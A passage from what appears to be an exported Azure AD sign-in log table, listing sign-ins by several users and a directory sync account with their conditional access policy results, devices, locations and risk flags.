'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:51,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",268d392c-7163-4a17-b774-5f4f86670500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,268d392c-7163-4a17-b774-5f4f86670500,SigninLogs,Sucess,36.6404686,-78.26995087
+894,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,58:48.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,9cae6bc9-488b-44de-a938-b85c59ebb98e,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,DZ,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 07:58,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",89223cb6-60af-4a3e-b2e1-947006630700,,,"{'countryOrRegion': 'DZ', 'geoCoordinates': {'longitude': 3, 'latitude': 28}}",none,low,atRisk,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,,89223cb6-60af-4a3e-b2e1-947006630700,SigninLogs,Sucess,28,3
+895,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,27:22.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,4fe45728-a311-46a8-88e6-15da95570bfe,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 23:27,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",93d4df14-2ec3-46f2-a774-ff58a44b0600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,93d4df14-2ec3-46f2-a774-ff58a44b0600,SigninLogs,Sucess,41.90428925,-85.99833679
+896,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,00:28.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,331b8dad-4bd2-4242-b864-f972effdbb38,Microsoft.aadiam,Microsoft.aadiam,,Megan Bowens,4,KH,Skype Web Experience On Office 365,e48d4214-364e-4731-b2b6-47dabf529218,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 08:00,"{'operatingSystem': 'Windows 10', 'deviceId': '9aa98fe3-7c54-470d-9075-1ebaedee4404', 'browser': 'Edge 80.0.361', 'displayName': 'DESKTOP-70VO6AJ', 'trustType': 'Azure AD joined'}",65ce963c-c870-4311-8389-19e591c70600,,,"{'countryOrRegion': 'KH', 'geoCoordinates': {'longitude': 105, 'latitude': 13}}",none,low,atRisk,none,[],{'errorCode': 0},Megan Bowens,eababd92-9dc7-40e3-9359-6c106522db19,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Skype for Business Online,65ce963c-c870-4311-8389-19e591c70600,SigninLogs,Sucess,13,105
+897,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,20:59.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,42500207-d5f7-4e63-b565-58c78a81ea67,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,09/04/2020 00:20,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",8a945db4-b61d-4e46-b881-75d8f2040600,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,8a945db4-b61d-4e46-b881-75d8f2040600,SigninLogs,Sucess,36.6404686,-78.26995087
+898,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,45:59.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,5850e971-4ea5-4b00-974e-ded1b1e15ecb,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office Online Client AAD- Augmentation Loop,2abdc806-e091-4495-9b10-b04d93c3f040,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:45,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",875c831a-2c9c-4e0a-b7c7-b8309f791200,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Augmentation Loop,875c831a-2c9c-4e0a-b7c7-b8309f791200,SigninLogs,Sucess,33.7984581,-84.38828278
+899,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:57.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,0fc6a063-4561-44b0-b31a-72955bb4babb,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 15:50,"{'operatingSystem': 'Windows 8', 'deviceId': '', 'browser': 'Rich Client 5.0.5.0'}",41cc5746-ae7e-445a-962a-17f6804b1300,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -78.26995086669922, 'latitude': 36.64046859741211}, 'state': 'Virginia', 'city': 'Boydton'}",none,none,none,none,[],{'errorCode': 0},On-Premises Directory Synchronization Service Account,b5084e7d-75cb-41c3-949b-bf61e1f9636b,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,41cc5746-ae7e-445a-962a-17f6804b1300,SigninLogs,Sucess,36.6404686,-78.26995087
+900,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,13:49.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a1165b22-be1d-4e78-8b8a-73a0d8bbff2b,Microsoft.aadiam,Microsoft.aadiam,,Ashish Kapila,4,GB,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:13,"{'operatingSystem': 'Windows 10', 'deviceId': 'a8835158-f705-4014-a58f-5a04beb76aba', 'browser': 'Edge 80.0.361', 'displayName': 'MININT-15OQVR5', 'trustType': 'Hybrid Azure AD joined', 'isCompliant': True, 'isManaged': True}",bba3adde-622a-4cd6-8325-bcbaa6a33000,,,"{'countryOrRegion': 'GB', 'geoCoordinates': {'longitude': -0.9697200059890749, 'latitude': 51.445831298828125}, 'state': 'Reading', 'city': 'Reading'}",none,none,none,none,[],{'errorCode': 0},Ashish Kapila,61c20c19-6e81-4684-affc-fdb7086bb546,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,bba3adde-622a-4cd6-8325-bcbaa6a33000,SigninLogs,Sucess,51.4458313,-0.969720006
+901,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,51:02.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,d736ac59-793a-44b3-96f9-cb398477fe8a,Microsoft.aadiam,Microsoft.aadiam,,On-Premises Directory Synchronization Service Account,4,US,Microsoft Azure Active Directory Connect,cb1056e2-e479-49de-ae31-7812af012ed8,Mobile Apps and Desktop clients,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test 